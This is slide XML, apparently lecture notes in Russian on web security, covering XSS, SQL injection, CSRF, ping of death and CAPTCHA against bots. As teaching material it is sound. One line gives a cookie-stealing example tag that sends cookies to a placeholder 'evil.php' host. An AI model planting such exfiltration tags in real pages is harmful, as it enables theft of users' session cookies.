            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Злоумышленник, пользуясь имеющимися на сайте средствами наподобие «отправить комментарий» посылает комментарий, содержащий тег &lt;script&gt;.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Написанный злоумышленником скрипт имеет доступ к пользовательским HTTP-Cookie. Скрипт ворует их, отправляя их на другой сайт (например, создав тег &lt;img src="http://example.com/evil.php?cookie=1234"&gt;).</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>на странице или в HTTP-Cookie могут быть весьма уязвимые данные (например, идентификатор сессии администратора). На популярном сайте скрипт может устроить DoS-атакy.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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3" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150920" y="692280"/>
            <a:ext cx="4554000" cy="3414240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="524" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5027040" cy="4112640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90360" rIns="90360" tIns="44280" bIns="44280" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Некоторое время такая уязвимость была на сайте </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>google</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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5" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150920" y="692280"/>
            <a:ext cx="4554000" cy="3414240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="526" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5027040" cy="4112640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90360" rIns="90360" tIns="44280" bIns="44280" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Поиск на сайте SecurityFocus</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="2000"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Your search for … returned the following results</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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7" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150920" y="692280"/>
            <a:ext cx="4554000" cy="3414240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="528" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5027040" cy="4112640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90360" rIns="90360" tIns="44280" bIns="44280" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>«Страница … не найдена» в PayPal</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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9" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150920" y="692280"/>
            <a:ext cx="4554000" cy="3414240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="530" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5027040" cy="4112640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90360" rIns="90360" tIns="44280" bIns="44280" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Корректная работа сайта</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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1" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150920" y="692280"/>
            <a:ext cx="4554000" cy="3414240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="532" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5027040" cy="4112640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90360" rIns="90360" tIns="44280" bIns="44280" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Некоторое время такая уязвимость была на сайте </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>google</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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3" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150920" y="692280"/>
            <a:ext cx="4554000" cy="3414240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="534" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5027040" cy="4112640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90360" rIns="90360" tIns="44280" bIns="44280" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>измененный SQL-запрос вернет все записи из таблицы пользователей. Часто берется первая из них, а это обычно Admin</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>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5" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150920" y="692280"/>
            <a:ext cx="4554000" cy="3414240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="536" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5027040" cy="4112640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90360" rIns="90360" tIns="44280" bIns="44280" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Cross-Site Request Forgery</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>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7" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150920" y="692280"/>
            <a:ext cx="4554000" cy="3414240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="538" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5027040" cy="4112640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90360" rIns="90360" tIns="44280" bIns="44280" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Cross-Site Request Forgery</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>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9" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150920" y="692280"/>
            <a:ext cx="4554000" cy="3414240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="540" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5027040" cy="4112640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90360" rIns="90360" tIns="44280" bIns="44280" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Ping of death</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>On the Internet, ping of death is a denial of service (DoS) attack caused by an attacker deliberately sending an IP packet larger than the 65,536 bytes allowed by the IP protocol. One of the features of TCP/IP is fragmentation; it allows a single IP packet to be broken down into smaller segments. In 1996, attackers began to take advantage of that feature when they found that a packet broken down into fragments could add up to more than the allowed 65,536 bytes. Many operating systems didn't know what to do when they received an oversized packet, so they froze, crashed, or rebooted. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Ping of death attacks were particularly nasty because the identity of the attacker sending the oversized packet could be easily spoofed and because the attacker didn't need to know anything about the machine they were attacking except for its IP address. By the end of 1997, operating system vendors had made patches available to avoid the ping of death. Still, many Web sites continue to block Internet Control Message Protocol (ICMP) ping messages at their firewalls to prevent any future variations of this kind of denial of service attack.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Недостаточное противодействие автоматизации </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>возникает, когда сервер позволяет автоматически выполнять операции, которые должны проводиться вручную. Для некоторых функций приложения необходимо реализовывать защиту от автоматических атак.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Автоматизированные программы могут варьироваться от безобидных роботов поисковых систем до систем автоматизированного поиска уязвимостей и регистрации учетных записей. Подобные роботы генерируют тысячи запросов в минуту, что может привести к падению производительности всего приложения. Чтобы противодействовать ботам, используется </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>CAPTCHA (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>от англ. «</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Completely Automated Public Turing test to tell Computers and Humans Apart» — </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>полностью автоматизированный публичный тест Тьюринга для различия компьютеров и людей) Основная идея теста: предложить пользователю такую задачу, которую может решить человек, но которую крайне трудно научить решать компьютер. В основном это задачи на распознавание символов.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
